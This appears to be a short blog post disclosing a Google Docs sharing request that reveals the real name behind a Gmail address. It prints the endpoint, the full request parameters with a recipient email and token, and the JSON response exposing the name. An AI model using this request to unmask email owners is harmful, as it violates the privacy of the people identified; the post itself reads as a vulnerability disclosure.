Google Security hole: Determine people’s names from their Gmail Account
Posing to this url:
https://docs.google.com/e/commonshare
app 2
authuser 0
clientUser 10495966446245
confirmed false
foreignService kix
hl en
itemIds 1kKdL8JV8jJP5sDBprLzAgxDGvDTTA_s8KY
notificationInfo {“messageType”:”invite”,”recipient”:”someemail@gmail.com“,”optionValues”:{“ccMe”:false,”pasteInEmail”:false}}
requestType invite
role 30
sendEmail true
shareProtocolVersion 2
shareService kix
subapp 10
token US5VKC0BAAA.J0BSgZ7BpREraHwLcA
&&&START&&&{“status”:0,”modelChanges”:[{“aclEntries”:[{“scope”:{“name”:”Their name appears here“,”id”:”114892889789266972″,”scopeType”:”user”,”me”:false,”email”:”somemail@gmail.com“},”role”:30}],”id”:”1kKdL8JV8jJP5Tr3prLzAgxDGvDTTA_s8KY”,”visibilitySetting”:{“role”:0,”summary”:”Private to me + 3 more”,”visibilityState”:”private”,”restrictedToDomain”:true,”visibilityEntries”:[{“role”:0,”summary”:”Private”,”visibilityState”:”private”,”restrictedToDomain”:true,”details”:”Only people explicitly granted permission can access. Sign-in required.”}]}}]}
Interesting? 🙂